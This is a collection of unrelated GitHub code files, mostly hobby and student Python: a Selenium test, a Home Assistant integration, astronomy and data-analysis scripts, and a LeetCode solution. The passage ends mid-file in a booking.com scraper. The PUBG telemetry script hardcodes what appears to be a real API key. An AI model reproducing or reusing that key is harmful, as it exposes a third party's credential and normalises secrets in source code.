+{"seq_id":"32320276287","text":"\"\"\"\n======================\n@author:小谢学测试\n@time:2021/9/8:16:19\n@email:xie7791@qq.com\n======================\n\"\"\"\nimport pytest\nfrom selenium import webdriver\nimport time\nimport allure\n@allure.testcase(\"http://www.baidu.com\")\n@allure.feature(\"百度搜索\")\n@pytest.mark.parametrize('test_data1',['allure','pytest','unittest'])\ndef test_steps(test_data1):\n with allure.step(\"打开百度网页\"):\n driver = webdriver.Firefox()\n driver.maximize_window()\n driver.get(\"http://www.baidu.com\")\n with allure.step(f\"输入搜索关键词:{test_data1}\"):\n driver.find_element_by_id(\"kw\").send_keys(test_data1)\n\n driver.find_element_by_id(\"su\").click()\n\n with allure.step(\"保存图片\"):\n driver.save_screenshot(\"./result/b.png\")\n allure.attach.file(\"./result/b.png\", attachment_type=allure.attachment_type.PNG)\n allure.attach('首页','Attch with HTML',allure.attachment_type.HTML)\n with allure.step(\"关闭浏览器\"):\n driver.quit()","repo_name":"xieIe-xie/hogwarts_test","sub_path":"test_baidu.py","file_name":"test_baidu.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21619754877","text":"\"\"\"The s05channel Integration.\"\"\"\nimport asyncio\nimport logging\nfrom datetime import timedelta\nfrom typing import Any\nimport glob\n\nimport async_timeout\nimport serial\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import (\n CONF_HOST,\n CONF_NAME,\n CONF_SCAN_INTERVAL,\n Platform,\n)\n\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.device_registry import DeviceEntry\nfrom homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed\n\nfrom .const import DOMAIN, ConfDefaultInt\n# ConfDefaultFlag,\nfrom .const import RetrySettings\n#ConfName,\nfrom .hub import DataUpdateFailed, HubInitFailed, S05ChannelMultiHub\n\n_LOGGER = logging.getLogger(__name__)\n_LOGGER.setLevel(logging.DEBUG)\n\nPLATFORMS: list[str] = [\n Platform.SENSOR,\n]\n\nasync def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:\n \"\"\"Set up an S0 meter.\"\"\"\n\n _LOGGER.debug( \"!!!!!!!! async_setup_entry !!!!!!!!!!!!!!\" )\n _LOGGER.debug( entry.data )\n\n entry_updates: dict[str, Any] = {}\n if CONF_SCAN_INTERVAL in entry.data:\n data = {**entry.data}\n entry_updates[\"data\"] = data\n entry_updates[\"options\"] = {\n **entry.options,\n CONF_SCAN_INTERVAL: data.pop(CONF_SCAN_INTERVAL),\n }\n if entry_updates:\n hass.config_entries.async_update_entry(entry, **entry_updates)\n\n ports = glob.glob('/dev/ttyACM[0-9]*')\n _LOGGER.debug( ports )\n\n for port in ports:\n try:\n s = serial.Serial(port)\n s.close()\n\n _LOGGER.debug( port )\n _LOGGER.debug( entry.data[CONF_HOST] )\n if port == entry.data[CONF_HOST]:\n s05channel_hub = S05ChannelMultiHub(\n hass,\n entry.data[CONF_NAME],\n entry.data[CONF_HOST]\n )\n\n coordinator = S05ChannelCoordinator(\n hass,\n s05channel_hub,\n entry.options.get(CONF_SCAN_INTERVAL, ConfDefaultInt.SCAN_INTERVAL),\n )\n\n _LOGGER.debug(\"...................................\")\n _LOGGER.debug(entry.entry_id)\n hass.data.setdefault(DOMAIN, {})\n hass.data[DOMAIN][entry.entry_id] = {\n \"hub\": s05channel_hub,\n \"coordinator\": coordinator,\n }\n\n await coordinator.async_config_entry_first_refresh()\n\n await hass.config_entries.async_forward_entry_setups(entry, PLATFORMS)\n\n entry.async_on_unload(entry.add_update_listener(async_reload_entry))\n\n except Exception:\n pass\n\n return True\n\n\nasync def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:\n \"\"\"Unload a config entry.\"\"\"\n s05channel_hub = hass.data[DOMAIN][entry.entry_id][\"hub\"]\n await s05channel_hub.shutdown()\n\n unload_ok = await hass.config_entries.async_unload_platforms(entry, PLATFORMS)\n if unload_ok:\n hass.data[DOMAIN].pop(entry.entry_id)\n\n return unload_ok\n\n\nasync def async_reload_entry(hass: HomeAssistant, entry: ConfigEntry) -> None:\n \"\"\"Handle an options update.\"\"\"\n await hass.config_entries.async_reload(entry.entry_id)\n\n\nasync def async_remove_config_entry_device(\n hass: HomeAssistant, config_entry: ConfigEntry, device_entry: DeviceEntry\n) -> bool:\n \"\"\"Remove a config entry from a device.\"\"\"\n s05channel_hub = hass.data[DOMAIN][config_entry.entry_id][\"hub\"]\n\n known_devices = []\n\n for inverter in s05channel_hub.inverters:\n inverter_device_ids = {\n dev_id[1]\n for dev_id in inverter.device_info[\"identifiers\"]\n if dev_id[0] == DOMAIN\n }\n for dev_id in inverter_device_ids:\n known_devices.append(dev_id)\n\n for meter in s05channel_hub.meters:\n meter_device_ids = {\n dev_id[1]\n for dev_id in meter.device_info[\"identifiers\"]\n if dev_id[0] == DOMAIN\n }\n for dev_id in meter_device_ids:\n known_devices.append(dev_id)\n\n this_device_ids = {\n dev_id[1] for dev_id in device_entry.identifiers if dev_id[0] == DOMAIN\n }\n\n for device_id in this_device_ids:\n if device_id in known_devices:\n _LOGGER.error(f\"Failed to remove device entry: device {device_id} in use\")\n return False\n\n return True\n\n\nclass S05ChannelCoordinator(DataUpdateCoordinator):\n \"\"\"S05ChannelCoordinator.\"\"\"\n\n def __init__(\n self, hass: HomeAssistant, hub: S05ChannelMultiHub, scan_interval: int\n ):\n \"\"\"Init so channel coordinator.\"\"\"\n super().__init__(\n hass,\n _LOGGER,\n name=\"S05Channel Coordinator\",\n update_interval=timedelta(seconds=scan_interval),\n )\n self._hub = hub\n\n async def _async_update_data(self):\n try:\n async with async_timeout.timeout(self._hub.coordinator_timeout):\n return await self._refresh_s05channel_data_with_retry(\n ex_type=DataUpdateFailed,\n limit=RetrySettings.Limit,\n wait_ms=RetrySettings.Time,\n wait_ratio=RetrySettings.Ratio,\n )\n\n except HubInitFailed as e:\n raise UpdateFailed(f\"{e}\")\n\n except DataUpdateFailed as e:\n raise UpdateFailed(f\"{e}\")\n\n async def _refresh_s05channel_data_with_retry(\n self,\n ex_type=Exception,\n limit=0,\n wait_ms=100,\n wait_ratio=2,\n ):\n \"\"\"Retry refresh until no exception occurs or retries exhaust.\"\"\"\n\n _LOGGER.debug(\"_refresh_s05channel_data_with_retry\")\n attempt = 1\n while True:\n try:\n #return await self._hub.async_refresh_s05channel_data()\n return await self._hub.async_refresh_s05channel_data()\n except Exception as ex:\n if not isinstance(ex, ex_type):\n raise ex\n if 0 < limit <= attempt:\n _LOGGER.debug(f\"No more data refresh attempts (maximum {limit})\")\n raise ex\n\n _LOGGER.debug(f\"Failed data refresh attempt #{attempt}\", exc_info=ex)\n\n attempt += 1\n _LOGGER.debug(\n f\"Waiting {wait_ms} ms before data refresh attempt #{attempt}\"\n )\n await asyncio.sleep(wait_ms / 1000)\n wait_ms *= wait_ratio\n","repo_name":"Revenberg/s05channel","sub_path":"custom_components/s05channel/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35962635894","text":"import sys\nimport math\nimport numpy as np\nfrom datetime import datetime\nimport win32com.client #needed to load COM objects\nimport ephem\n\nutil = win32com.client.Dispatch(\"ASCOM.Utilities.Util\")\n\nclass TelescopeData():\n def ConvertCoord(TRa, Tdec, TLst, TUtc):\n #read telescopes data\n telRa = TRa\n telDec = Tdec\n telLST = TLst\n telUTC = TUtc\n\n #calculates HA\n telHA = telLST - telRa\n telHA = 0.2618*(telLST - telRa)\n if telHA > math.pi:\n telHA -= 2 * math.pi\n if telHA < -math.pi:\n telHA += 2 * math.pi\n telHA = telHA/0.2618\n\n #convert format \n raCoord = util.HoursToHMS(telRa, \" \", \" \", \"\", 2)\n decCoord = util.DegreesToDMS(telDec, \" \", \" \", \"\", 2)\n haCoord = util.HoursToHMS(telHA, \" \", \" \", \"\", 2)\n lstCoord = util.HoursToHMS(telLST, \" \", \" \", \"\", 2)\n utcCoord = telUTC\n\n return raCoord, decCoord, haCoord, lstCoord, utcCoord\n\n def pointConvert(ra_point, dec_point):\n Radouble = util.HMSToHours(ra_point)\n DecDouble = util.DMSToDegrees(dec_point)\n\n return Radouble, DecDouble\n \n def precess_coord(ra_target, dec_target):\n #teste pyephem\n OPD=ephem.Observer()\n OPD.lat='-22.5344'\n OPD.lon='-45.5825'\n OPD.date = datetime.utcnow()\n # %% these parameters are for super-precise estimates, not necessary.\n OPD.elevation = 1864 # meters\n star = ephem.FixedBody()\n star._ra = ephem.hours(ra_target.replace(\" \",\":\")) # in hours for RA\n star._dec = ephem.degrees(dec_target.replace(\" \",\":\"))\n star.compute(OPD)\n ra_hms = str(star.ra).replace(\":\", \" \")\n dec_dms = str(star.dec).replace(\":\", \" \")\n\n return ra_hms, dec_dms\n \n","repo_name":"ramonefoster/tcspd-bancada","sub_path":"Telescope/telescopeCoord.py","file_name":"telescopeCoord.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70944300370","text":"import glob\nimport re\nimport pyvista as pv #https://docs.pyvista.org/version/stable/user-guide/simple.html\nimport numpy as np\n\n#make sure a dpm from a timestep is not\n#present in the next one\n\n# filenames\nbase_dir = \"/home/dventuri/run/canal_30m/output/dpm/pvtp/vtp\"\nbase_fname = f\"{base_dir}/dpm_*_*.vtp\"\ntimestep_treshold = 60000\n\n# 'x' cutoff position\nx_cut = 29.9 # meters\n\n### function - sort numerically\ndef numericalSort(value):\n numbers = re.compile(r'(\\d+)') #regex to match any repeating numerical Unicode character\n parts = numbers.split(value) #splits the string using \"numbers\"\n parts = map(int, parts[1::2]) #returns only the numbers converted to ints\n return tuple(parts)\n\n### function - compare timesteps\ndef timestep_above(value, threshold):\n parts = numericalSort(value)\n return parts[-2] >= threshold #uses second to last number (last is partition number)\n\n# generate list o filenames to read (numerically sorted and only above timestep threshold)\nfnames = sorted(glob.glob(base_fname), key=numericalSort) #sorts the list of names using the converted numbers\nfnames = [fname for fname in fnames if timestep_above(fname, timestep_treshold)]\n\n# start iterating on files\ndpm_diam_all = []\nfor fname in fnames:\n # read vtp data\n dpm = pv.read(fname)\n\n # cehck if x_max < x_cutoff\n if (dpm.bounds[1] < x_cut): continue\n\n # print filename\n print('\\nReading file ', fname)\n\n # what are the mesh bounds?\n print('Bounds: ', dpm.bounds)\n\n # how many points are in this mesh\n print('Total points in file: ', dpm.n_points)\n\n # access a point data array inside de vtk\n dpm_diam = dpm.point_data['dpm_diameter']\n if (dpm_diam.size != dpm.n_points):\n raise ValueError(\"Wrong number of points for diameter point data\")\n\n # access dpm x position\n dpm_x = dpm.points[:,0]\n if (dpm_x.size != dpm.n_points):\n raise ValueError(\"Wrong number of points for position point data\")\n\n # filter only values at (x > x_cutoff)\n filter_arr = dpm_x > x_cut\n dpm_diam_filtered = dpm_diam[filter_arr]\n print('Points after filtering: ', dpm_diam_filtered.size)\n dpm_diam_all.append(dpm_diam_filtered)\n\n\n# consolidate complete vector\ndpm_diam_all = np.hstack(dpm_diam_all)\nprint('\\nTotal points: ', dpm_diam_all.size)\n\n# save array to file\nnp.savetxt('dpm_diam_all.txt', dpm_diam_all)\n","repo_name":"dventuri/vtk2python_read_dpm_MFSim","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40313740551","text":"from ..api.api_db import ApiDB\nfrom ..gp.gp_db import GameparamsDB\nfrom ..i18n.i18n_db import I18NDb\nfrom .warship_db import WarshipDB\n\npath = 'res/warships.sqlite'\n\n\ndef create_warships_db():\n\tapidb = ApiDB()\n\tgpm = GameparamsDB()\n\twarshipdb = WarshipDB()\n\ti18n = I18NDb()\n\twarshipdb.init_db()\n\n\tship_ids = apidb.list_all_ships()\n\tships = []\n\tfor name, ship_id_str in ship_ids:\n\t\tship = gpm.search_ship(ship_id_str, i18n)\n\t\tships.append((ship, name))\n\twarshipdb.insert_data(ships)\n","repo_name":"hiraki-uk/discord-wows-bot","sub_path":"init/warship/create_warship_db.py","file_name":"create_warship_db.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10681109291","text":"from core.pubg import PUBG\nimport requests\nfrom PIL import Image, ImageDraw\nfrom telemetry.telemetry import Telemetry\nfrom constants.constants import Events\nimport json\n\n\ndef sem_api():\n key = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJqdGkiOiIwMDQzNWU1MC0xODZiLTAxMzctNzM1OC0wZTM1MzFmZGJkNWEiLCJpc3MiOiJnYW1lbG9ja2VyIiwiaWF0IjoxNTUwNzk3MTU2LCJwdWIiOiJibHVlaG9sZSIsInRpdGxlIjoicHViZyIsImFwcCI6InB1YmctdGVhY2hlciJ9.zM2r5FJZP3IkcRVVFN1ApBDesf-JJn3QPAZyxNr2QR4'\n plat = 'steam'\n pubg = PUBG(key, plat)\n \n miramar = Image.open('miramar_original.jpg')\n kill = Image.open('Death.png')\n position = Image.open('position.png')\n\n #t = Telemetry(telemetry.json(), Events.LogPlayerKill)\n \n with open('json/telemetry_1.json') as data:\n t = pubg.get_telemetry_from_json(json.load(data), Events.LogPlayerKill)\n for event in t.events:\n x, y = event.victim.location.x, event.victim.location.y\n miramar.paste(kill, (int(8000 * x / 816000), int(8000 * y / 816000)), kill)\n \n '''\n count = 0\n verify = 0\n\n for ox, oy in t.player_kill():\n miramar.paste(kill, (int(ox), int(oy)), kill)\n\n for ox, oy, r in t.safety_zone_position():\n draw = ImageDraw.Draw(miramar)\n draw.ellipse((ox - r, oy - r, ox + r, oy + r), outline='green')\n\n \n if tele['_T'] == 'LogPlayerPosition':\n if tele['character']['name'] == 'Tecnosh':\n x = tele['character']['location']['x']\n y = tele['character']['location']['y']\n\n ox = 2048 * x / 816000\n oy = 2048 * y / 816000\n print(ox, oy)\n erangel.paste(position, (int(ox), int(oy)), position)\n '''\n \n miramar.show()\n \nif __name__ == '__main__':\n sem_api()","repo_name":"terafiros/PUBG","sub_path":"test_no_api.py","file_name":"test_no_api.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"3125039316","text":"\"\"\"Pi verification\"\"\"\nfrom decimal import Decimal as D\n\n\ndef correct_decimal_points(pi: D, file_name: str = \"src/pi.txt\") -> int:\n \"\"\"Counts correct decimal points of approximated pi based on verification file\n\n :param pi: approximated pi\n :type pi: Decimal\n :param file_name: path to verification file (decimal points seperated by\n newline)\n :type file_name: str\n :returns: correct decimal points\n :rtype: int\n \"\"\"\n decimal_points = str(pi)[2:] # remove \"3.\"\n\n index = 0\n correct = 0\n\n with open(file_name) as f:\n for line in f:\n line = line[:1] # remove line break\n\n if index < len(decimal_points) and line == decimal_points[index]:\n correct += 1\n index += 1\n else:\n break\n\n return correct\n","repo_name":"umcconnell/archimedes-pi","sub_path":"src/verify.py","file_name":"verify.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"16892698581","text":"import http.server\nfrom prometheus_client import start_http_server, Counter\n\nREQUESTS = Counter('test_request_total', 'This is a counter test metric for Total Get requests')\n\nclass MyHandler(http.server.BaseHTTPRequestHandler):\n def do_GET(self):\n REQUESTS.inc()\n self.send_response(200)\n self.end_headers()\n self.wfile.write(b\"test\")\n\nif __name__ == \"__main__\":\n start_http_server(5001)\n server =http.server.HTTPServer(('192.168.222.14', 5000), MyHandler)\n server.serve_forever()\n\n\n","repo_name":"ProtoRiaan/PrometheustrainingUdemy","sub_path":"httpserver_test.py","file_name":"httpserver_test.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70355088212","text":"class Solution:\n def findDuplicate(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n if not nums: return \n slow = nums[0]\n fast = nums[0]\n entry = nums[0]\n \n while True:\n slow = nums[slow]\n fast = nums[nums[fast]]\n if slow == fast:\n break\n \n while slow != entry:\n slow = nums[slow]\n entry = nums[entry]\n return entry\n\n# Description:\n# Given an array nums containing n + 1 integers \n# where each integer is between 1 and n (inclusive), \n# prove that at least one duplicate number must exist. \n# Assume that there is only one duplicate number, \n# find the duplicate one.\n\n# Example 1:\n\n# Input: [1,3,4,2,2]\n# Output: 2\n# Example 2:\n\n# Input: [3,1,3,4,2]\n# Output: 3\n# Note:\n\n# You must not modify the array (assume the array is read only).\n# You must use only constant, O(1) extra space.\n# Your runtime complexity should be less than O(n2).\n# There is only one duplicate number in the array, \n# but it could be repeated more than once.\n#################################################\n\n# Solution:\n# Floyd's Tortoise and Hare (Cycle Detection)\n# See: 142-Linked List Cycle II\n# 有重复元素表示按照如下方式走,会有相遇,\n# 路径中环的entry即为重复元素\n# slow = nums[slow]\n# fast = nums[nums[fast]]\n\n# 参见142题解:\n# 1. 用slower和faster方法判断是否有环;\n# 2. 设链表的头节点是head,\n# 环的入口节点是entry, \n# slower和 faster 2个指针相遇的节点是meeting;\n# 3. 设L1是head到entry的正向距离,\n# L2是entry到meeting的正向距离,\n# C是环的长度,\n# n是faster指针在cycle里遍历的次数(不到一遍算0);\n\n# 根据上面的定义,可知:\n\n# 1. 当slower和faster相遇时,\n# slower已经走了L1 + L2的距离,\n# 也即head和meeting的距离;\n# 2. 当slower和faster相遇时,faster已经走了L1 + L2 + n * C的距离;\n# 3. 因为slower步进1,而faster步进2,\n# 那么当slower和faster第一次相遇时,\n# faster已经走的距离是slower已经走的距离的两倍,\n# 即 2* (L1 + L2) = L1 + L2 + n * C \n# => L1 = (n - 1) * C + (C - L2)\n\n# L1 = (n - 1) * C + (C - L2) 这个等式表明, \n# head和entry的距离(L1),等于meeting到entry的正向距离\n# (链表是有遍历方向的)。\n\n# Beats: 99.73%\n# Runtime: 40ms\n# medium","repo_name":"listenviolet/Lab","sub_path":"leetcode/287-Find-the-Duplicate-Number.py","file_name":"287-Find-the-Duplicate-Number.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24198391570","text":"import pandas as pd\r\nimport numpy as np\r\n\r\n\r\ndef read_orders(n_clients, path =\"/Users/yd953/PycharmProjects/instacard/orders.csv\"):\r\n orders_df = pd.read_csv(path)\r\n orders_df = orders_df[[\"order_id\",\"user_id\"]]\r\n return orders_df[orders_df['user_id'].isin(range(N+1))]\r\n\r\n\r\ndef read_orders_products(path = \"/Users/yd953/PycharmProjects/instacard/order_products__prior.csv\"):\r\n orders_products_df = pd.read_csv(path)\r\n return orders_products_df[['order_id','product_id']]\r\n\r\ndef read_products(path=\"/Users/yd953/PycharmProjects/instacard/products.csv\"):\r\n product_df = pd.read_csv(path)\r\n return product_df[['product_id','department_id']]\r\n\r\n\r\nN=5\r\ndef read_write_sample(N=5):\r\n\r\n product_df = read_products()\r\n #lire un exemple d'order ['order_id','user_id']\r\n orders_df = read_orders(N)\r\n\r\n #lire order product avec ['order_id','product_id']\r\n orders_prod_df = read_orders_products()\r\n\r\n #1er merge ['user_id','order_id','product_id']\r\n orders_prod_df = pd.merge(orders_df,orders_prod_df,how=\"inner\",on='order_id')\r\n\r\n #2eme merge ['user_id','order_id','product_id','department_id']\r\n orders_prod_df = pd.merge(orders_prod_df,product_df,on='product_id')\r\n\r\n #garger les colonnes ['user_id','order_id','department_id']\r\n orders_prod_df = orders_prod_df[['user_id','order_id','department_id']]\r\n\r\n #save echantillons\r\n orders_prod_df.to_csv(\"/Users/yd953/PycharmProjects/instacard/merge_sample.csv\")\r\n\r\nread_write_sample()\r\n\r\n\r\ndef user_table():\r\n user = pd.read_csv(\"/Users/yd953/PycharmProjects/instacard/merge_sample.csv\")\r\n user_col = pd.unique(user['user_id']).tolist()\r\n user_col = user_col[:5]\r\n rows = []\r\n\r\n for i in user_col:\r\n data = user[user['user_id']== i]\r\n order_col = pd.unique(data['order_id']).tolist()\r\n\r\n liste = []\r\n for j in order_col:\r\n liste.append(data[data['order_id']==j]['department_id'])\r\n rows.append([i,liste])\r\n df = pd.DataFrame(rows,columns = ['user_id','department_id'])\r\n print(df)\r\n return df\r\n\r\ndef one_hot_post_padding(matrix, max_categories_found,):\r\n '''\r\n Make a one hot matrix X after a padding\r\n Input:\r\n matrix after the padding\r\n max_categories_found = max of categorie found in every baskets\r\n Output:\r\n a one hot matrix as an array\r\n '''\r\n\r\n X_onehot = [] #our new onehot list of list of list in output\r\n\r\n for user in matrix:\r\n '''for each user'''\r\n L = [] #onehot of each user\r\n\r\n for order in user:\r\n '''for each basket in each user'''\r\n L1 = np.zeros(max_categories_found + 1) #onehot of each basket/order by user\r\n #print(order)\r\n\r\n for categorie in order:\r\n '''for each categorie in each order'''\r\n #print(categorie)\r\n c = int(categorie) #transform categorie from float to integer\r\n\r\n if c == 0:\r\n L1[c] = 0\r\n else:\r\n L1[c] = 1\r\n\r\n L.append(list(L1)) #append each order to each user in the list\r\n\r\n X_onehot.append(L) #append each user in one elist\r\n\r\n return list(X_onehot)\r\ndf_user = user_table()\r\ndf_user.to_csv(\"/Users/yd953/PycharmProjects/instacard/merge_sample_l.csv\")\r\n\r\n","repo_name":"yalcindavid/instacard","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"22954194086","text":"# For example, given [10, 15, 3, 7] and k of 17, return true since 10 + 7 is 17.\n\n# Bonus: Can you do this in one pass?\n\ndef twoSum(arr, target):\n kv = {}\n for i in range(len(arr)):\n if target - arr[i] in kv:\n return True\n kv[arr[i]] = True\n return False\n\nprint(twoSum([10, 15, 3, 7], 17))\nprint(twoSum([10, 15, 3, 7], 30))\n\n","repo_name":"dongxiaohe/algorithm","sub_path":"daily_coding_problem/p_1.py","file_name":"p_1.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15314655884","text":"from astropy.io import fits\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom astropy.nddata.utils import Cutout2D\nfrom astropy.wcs import WCS\nimport datetime\nimport sys\n\nfrom ..physics import Greybody, Dust, get_instrument\n\nprint('success')\nsys.exit()\n\ndata_dir = \"/n/sgraraid/filaments/Perseus/Herschel/processed/1342190326/\"\ndef fn_gen(band_stub, offset=\"\"):\n if offset:\n offset = \"-plus{:06d}\".format(offset)\n return f\"{data_dir}{band_stub}-image-remapped-conv{offset}.fits\"\ndata_fns = {\n 160: fn_gen(\"PACS160um\", 45),\n 250: fn_gen(\"SPIRE250um\"),\n 350: fn_gen(\"SPIRE350um\"),\n 500: fn_gen(\"SPIRE500um\"),\n}\n\nresult_dir = \"/n/sgraraid/filaments/Perseus/Herschel/results/\"\nresult_fn = \"full-1.5.1-Per1-pow-1000-0.1-1.80.fits\"\nresult_path = f\"{result_dir}{result_fn}\"\n\nframe_key = {}\nwith fits.open(result_path) as hdul:\n for i in range(1, len(hdul)):\n frame_key[hdul[i].header['EXTNAME']] = i\n w = WCS(hdul[1].header)\n T, N = (hdul[frame_key[k]].data for k in ('T', 'N(H2)'))\n wavelens = sorted(list(data_fns.keys()))\n mant_diffs = [hdul[frame_key[f'diff{b}']].data for b in wavelens]\n mant_bands = [hdul[frame_key[f'BAND{b}']].data for b in wavelens]\nmant_models = [d+b for d, b in zip(mant_diffs, mant_bands)]\n\nif False:\n center = tuple(x//2 for x in mant_models[0].shape)\n width = 20\n c2d = Cutout2D(T, (center[1], center[0]), (width, width), wcs=w)\n cutout = c2d.slices_original\n for i in range(len(wavelens)):\n for l in (mant_diffs, mant_bands, mant_models):\n l[i] = l[i][cutout]\n T, N = T[cutout], N[cutout]\n w = c2d.wcs\n\nall_things = {f'mant_diff{b}': d for b, d in zip(wavelens, mant_diffs)}\nall_things.update({f'BAND{b}': d for b, d in zip(wavelens, mant_bands)})\nall_things.update({f'manticore{b}': d for b, d in zip(wavelens, mant_models)})\nall_things.update({'T': T, 'N': N})\n\n\nplt.figure()\nfor i, m in enumerate(mant_models):\n plt.subplot(221 + i)\n plt.title(f\"{wavelens[i]}\")\n plt.imshow(m, origin='lower', vmax=np.nanmedian(m)+2*np.nanstd(m))\nplt.gcf().canvas.set_window_title(\"Observations\")\nplt.figure()\nfor i, m in enumerate([T, N]):\n if i:\n m = np.log10(m)\n plt.subplot(121 + i)\n plt.title(\"N\" if i else \"T\")\n plt.imshow(m, origin='lower', vmax=np.nanmedian(m)+2*np.nanstd(m))\n plt.colorbar()\nplt.gcf().canvas.set_window_title(\"Model parameters\")\n\nmantipy_result = np.full((len(wavelens), T.size), np.nan)\nherschel = get_instrument(wavelens)\ndust = Dust(beta=1.80)\nfor i, t, n in zip(range(T.size), T.flat, N.flat):\n if np.isnan(t) | np.isnan(n):\n continue\n else:\n mantipy_result[:, i] = [d.detect(Greybody(t, np.log10(n), dust)) for d in herschel]\nmantipy_result = mantipy_result.reshape(len(wavelens), *(T.shape))\nmantipy_result = [mantipy_result[i] for i in range(len(wavelens))]\n\nplt.figure()\nfor i, m in enumerate(mantipy_result):\n all_things[f'py{wavelens[i]}'] = m\n plt.subplot(221 + i)\n plt.title(f\"{wavelens[i]}\")\n plt.imshow(m, origin='lower', vmax=np.nanmedian(m)+2*np.nanstd(m))\nplt.gcf().canvas.set_window_title(\"mantipython results\")\n\nplt.figure()\nfor i, m_py in enumerate(mantipy_result):\n m_core = mant_models[i]\n diff = m_py - m_core\n all_things[f'pycorediff{wavelens[i]}'] = diff\n difffrac = diff / m_core\n all_things[f'pycorediff_frac{wavelens[i]}'] = difffrac\n plt.subplot(221 + i)\n plt.title(f\"{wavelens[i]}\")\n m = difffrac\n plt.imshow(m, origin='lower', vmax=np.nanmedian(m)+2*np.nanstd(m))\nplt.gcf().canvas.set_window_title(\"final diffs\")\n\nphdu = fits.PrimaryHDU()\nphdu.header['DATE'] = (datetime.datetime.now(datetime.timezone.utc).astimezone().isoformat(), \"File creation date\")\nphdu.header['CREATOR'] = (\"Ramsey: {}\".format(str(__file__)), \"FITS file creator\")\nphdu.header['HISTORY'] = \"This is a comparison on Per1 of manticore vs mantipython\"\nphdu.header['HISTORY'] = \"manticore: {:s}\".format(result_fn)\nphdu.header.update(w.to_header())\nhdu_list = [phdu]\nfor k, v in all_things.items():\n ihdu = fits.ImageHDU(data=v, header=fits.Header())\n ihdu.header.update(w.to_header())\n ihdu.header['EXTNAME'] = k\n ihdu.header['BUNIT'] = \"MJy/sr unless K or cm-2. unitless if frac.\"\n if \"py\" in k:\n ihdu.header['HISTORY'] = \"Product of mantipython (Ramsey)\"\n elif \"mant\" in k:\n ihdu.header['HISTORY'] = \"Product of manticore (Kevin)\"\n hdu_list.append(ihdu)\nhdulnew = fits.HDUList(hdu_list)\nhdulnew.writeto(\"/home/rkarim/Research/mantipython/compare_manticore_2.fits\", overwrite=True)\n# plt.show()\n\nprint('done')\n","repo_name":"ramseykarim/mantipython","sub_path":"tests/accuracyVsManticoreTest.py","file_name":"accuracyVsManticoreTest.py","file_ext":"py","file_size_in_byte":4568,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"75404389331","text":"import math\nimport struct\n\ndef compute_expression(x):\n try:\n result = (1 / math.tan(x)) / math.sin(7 * x - 1)\n return result\n except ZeroDivisionError:\n return None\n\ndef read_text_file(file_path):\n with open(file_path, 'r') as file:\n lines = file.readlines()\n return [float(line.strip()) for line in lines]\n\ndef write_text_file(file_path, data):\n with open(file_path, 'w') as file:\n for item in data:\n file.write(f'{item}\\n')\n\ndef read_binary_file(file_path):\n with open(file_path, 'rb') as file:\n data = file.read()\n # Assuming the data is a sequence of double-precision floating-point numbers\n return struct.unpack(f'{len(data) // struct.calcsize(\"d\")}d', data)\n\ndef write_binary_file(file_path, data):\n with open(file_path, 'wb') as file:\n # Convert the list of doubles to a binary string\n binary_data = struct.pack(f'{len(data)}d', *data)\n file.write(binary_data)\n\nif __name__ == \"__main__\":\n # Приклад використання\n x_values = [0.1, 0.2, 0.3, 0.4, 0.5]\n \n # Обчислюємо значення виразу для кожного x\n y_values = [compute_expression(x) for x in x_values]\n\n # Записуємо дані у текстовий файл\n text_file_path = 'output.txt'\n write_text_file(text_file_path, y_values)\n\n # Зчитуємо дані з текстового файлу\n read_data_text = read_text_file(text_file_path)\n print(f'Read from text file: {read_data_text}')\n\n # Записуємо дані у двійковий файл\n binary_file_path = 'output.bin'\n write_binary_file(binary_file_path, y_values)\n\n # Зчитуємо дані з двійкового файлу\n read_data_binary = read_binary_file(binary_file_path)\n print(f'Read from binary file: {read_data_binary}')","repo_name":"dimaxalva/KZPLabs","sub_path":"lab8.py","file_name":"lab8.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"7896647320","text":"#coding=utf-8\r\n\r\n# http://www.booking.com/ 处理booking网站数据\r\n\r\n\r\nimport urllib2\r\nimport re\r\nimport md5\r\nfrom bs4 import BeautifulSoup\r\n\r\nfrom spider_mysqldb import Spider_MySQL_DBProcess\r\nfrom spider_data_base import *\r\nfrom spider_website_base import 